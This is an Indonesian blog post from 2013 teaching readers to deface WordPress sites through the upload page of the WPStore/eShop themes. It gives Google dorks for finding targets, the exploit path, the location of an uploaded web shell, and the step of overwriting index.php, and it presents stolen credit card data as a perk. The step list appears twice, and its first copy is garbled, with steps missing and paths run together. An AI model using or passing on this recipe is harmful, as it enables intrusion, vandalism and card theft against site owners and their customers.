Cara Deface Web dengan Metode Wp-Store Themes Uploader - Halo Defacer Indonesia, Kali ini saya akan memberi tahu anda cara mendeface website dengan Metode Wp-Store Themes Uploader. Walaupun Teknik ini Mulai di lupakan oleh sebagian defacer, apa salahnya kita mencoba untuk menambah ilmu deface.
Alasan Defacer-Defacer melupakan teknik ini:
1. Target sudah sangat sedikit.
2. Web yang bisa di tanami shell, hanya sedikit.
Kelebihan menggunakan teknik ini:
1. Jika anda beruntung, anda bisa mendapatkan kartu kredit (cc).
2. Cara penggunaannya relatif mudah.
Langkah-Langkah:
1. Cari target dengan Google Dork ini:
inurl:/wp-content/themes/eShop/
inurl:/wp-content/themes/WPStore/
inurl:/wp-content/themes/Store/
*Anda bisa menambahkan elemen Site: Di belakang Google Dork Tersebut
Ex: site:co.uk dll
2. Setelah Target ditemukan. langkah selanjutnya adalah masukkan exploit ini:
/wp-content/themes/WPStore/upload/
ex: site.com/wp-content/themes/eShop/style.css
menjadi
site.com/wp-content/themes/WPStore/upload/
menjadi
site.com/wp-content/uploads/products_img/namashell.php
*nama shell diganti dengan nama shell kamu.
*jika 404 not found, berarti web tersebut tidak bisa di tanam shell. dan cobalah untuk mengupload script deface.
5. Setelah masuk ke dalam shell. Tebas deh index.php nya. bukan index.html nya.
Jika anda belum mengerti, anda bisa bertanya di grup https://www.facebook.com/groups/indocyberattacker/
Alasan Defacer-Defacer melupakan teknik ini:
1. Target sudah sangat sedikit.
2. Web yang bisa di tanami shell, hanya sedikit.
Kelebihan menggunakan teknik ini:
1. Jika anda beruntung, anda bisa mendapatkan kartu kredit (cc).
2. Cara penggunaannya relatif mudah.
Langkah-Langkah:
1. Cari target dengan Google Dork ini:
inurl:/wp-content/themes/eShop/
inurl:/wp-content/themes/WPStore/
inurl:/wp-content/themes/Store/
*Anda bisa menambahkan elemen Site: Di belakang Google Dork Tersebut
Ex: site:co.uk dll
2. Setelah Target ditemukan. langkah selanjutnya adalah masukkan exploit ini:
/wp-content/themes/WPStore/upload/
ex: site.com/wp-content/themes/eShop/style.css
menjadi
site.com/wp-content/themes/WPStore/upload/
3. Setelah muncul tampilan seperti gambar diatas. Lalu kamu Upload Shell / Script Deface dalam bentuk .html
4. Setelah selesai, masukkan wp-content/uploads/products_img/namashell.php setelah alamat web target.
Ex: site.com/wp-content/themes/WPStore/upload/menjadi
site.com/wp-content/uploads/products_img/namashell.php
*nama shell diganti dengan nama shell kamu.
*jika 404 not found, berarti web tersebut tidak bisa di tanam shell. dan cobalah untuk mengupload script deface.
5. Setelah masuk ke dalam shell. Tebas deh index.php nya. bukan index.html nya.
Jika anda belum mengerti, anda bisa bertanya di grup https://www.facebook.com/groups/indocyberattacker/
kalau belum ngerti, jangan sungkan-sungkan bertanya kepada saya di kotak comment!
Semoga Bermanfaat
copyright © 2013 Scupe.Id
Comments
Post a Comment